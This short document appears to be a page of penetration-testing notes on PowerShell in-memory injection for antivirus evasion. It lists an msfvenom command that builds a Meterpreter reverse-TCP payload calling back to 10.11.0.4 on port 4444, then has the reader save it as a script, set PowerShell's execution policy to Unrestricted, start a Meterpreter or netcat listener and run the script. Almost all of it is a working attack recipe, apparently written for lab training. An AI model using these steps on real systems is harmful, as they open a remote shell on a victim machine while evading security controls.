Using script in powershell
Using script in powershell
(Powershell in memory injection)
Create payloas=d msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f powershell
Create powershell script av.ps1 and place the payload in it
By default ps1 script are restricted in powershell , so unrestrict it Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
Start meterpreter session or netcat to listen
.\av.ps1
Last updated